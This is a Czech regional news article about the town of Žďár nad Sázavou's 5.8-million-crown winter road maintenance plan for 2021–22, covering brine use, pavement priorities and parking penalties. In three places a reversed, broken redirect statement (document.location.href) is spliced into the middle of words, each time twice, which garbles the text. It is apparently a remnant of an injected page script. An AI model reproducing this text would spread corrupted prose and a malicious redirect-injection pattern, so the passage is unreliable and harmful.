Rainbow page separator

Technické služby při zimní údržbě využijí zkušenosti z loňska

Sobota, 16. října 2021

Žďár nad Sázavou / Celkem 5,8 milionu korun hodlá žďárská radnice vyčlenit na zimní údržbu města. V současné době je již schválený plán zimní údržby, který platí od 1. lis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topadu do 31. března, a co do použité technologie a intenzity činností bude podobný jako předešlou zimu. Městské komunikace mají být ošetřovány pomocí pluhu a k životnímu prostředí šetrnější solankou, v extrémních případech pak i solí, přičemž v místech, kam se technika nedostane, půjde o ruční vyhazování sněhu i posyp inertním materiálem. V plánu údržby jsou oproti minulé zimě avizovány pouze drobné změny, například v přeřazení některých chodníků do jiných stupňů intenzity údržby, což zároveň souvisí s úvodními zkušenostmi pracovníků technických služeb, nové divize městské firmy SATT, kteří v loňském roce zimní údržbu Žďáru zajišťovali poprvé. Nadále by se tak měly udržovat místní komunikace v cha[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tové osadě Krejdy, kde podle vedení města přibývá trvalých obyvatel, zatímco mezi neudržované se dostaly komunikace pro pěší v nové části průmyslové zóny v Jamské ulici. Se zimní údržbou komunikací budou spojeny rovněž postihy pro mo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toristy, kteří zaparkují svoje auta na chodníku, přičemž znemožní technice jeho prohrnutí a posyp.